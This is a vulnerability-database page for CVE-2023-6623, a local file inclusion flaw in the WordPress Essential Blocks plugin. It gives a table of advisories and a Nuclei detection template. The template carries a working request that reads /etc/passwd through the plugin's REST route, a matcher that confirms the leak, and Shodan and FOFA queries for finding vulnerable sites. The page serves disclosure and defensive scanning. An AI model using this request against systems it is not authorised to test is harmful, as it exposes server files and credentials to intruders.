| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2023-6623 | 15 Jan 2024 17:27 | – | circl |
| WordPress Plugin Essential Blocks Security Vulnerability | 15 Jan 2024 00:00 | – | cnnvd |
| CVE-2023-6623 | 15 Jan 2024 15:10 | – | cve |
| CVE-2023-6623 Essential Blocks < 4.4.3 - Unauthenticated Local File Inclusion | 15 Jan 2024 15:10 | – | cvelist |
| CVE-2023-6623 | 15 Jan 2024 16:15 | – | nvd |
| CVE-2023-6623 | 15 Jan 2024 16:15 | – | osv |
| WordPress Essential Blocks plugin < 4.4.3 - Unauthenticated Local File Inclusion vulnerability | 6 Feb 2026 06:17 | – | patchstack |
| Design/Logic Flaw | 15 Jan 2024 16:15 | – | prion |
| PT-2023-32722 · WordPress · Essential Blocks | 23 Dec 2023 00:00 | – | ptsecurity |
| CVE-2023-6623 | 23 May 2025 04:57 | – | redhatcve |

```yaml
id: CVE-2023-6623
info:
  name: Essential Blocks < 4.4.3 - Local File Inclusion
  author: iamnoooob,rootxharsh,pdresearch,coldfish
  severity: critical
  description: |
    Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
  remediation: |
    Upgrade to the latest version of Essential Blocks 4.4.3 to fix this issue.
  reference:
    - https://wpscan.com/blog/file-inclusion-vulnerability-fixed-in-essential-blocks-4-4-3/
    - https://flysec-blog.blogspot.com/2024/01/cve-2023-6623-file-inclusion.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6623
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-6623
    cwe-id: CWE-22
    epss-score: 0.50673
    epss-percentile: 0.98784
    cpe: cpe:2.3:a:wpdeveloper:essential_blocks:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wpdeveloper
    product: essential_blocks
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/essential-blocks/
    fofa-query: body=/wp-content/plugins/essential-blocks/
    publicwww-query: "/wp-content/plugins/essential-blocks/"
  tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi,wpdeveloper,vkev,vuln
http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={"__file":"/etc%2fpasswd"}'
      - '{{BaseURL}}/wp-content/plugins/essential-blocks/readme.txt'
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "regex('root:.*:0:0:', body_1)"
          - 'contains(body_2, "Essential Blocks – Page")'
        condition: and
# digest: 4a0a00473045022075eef36ef7a9c3be4e4364a0b5cb3b34506481c89a79d073f0fa15f75f9f243d0221009a07d6d9a8b67783ebcf699e2c26def55b2ad1c59bcb72486235c4c31ca7432f:922c64590222798bb761d5b6d8e72950
```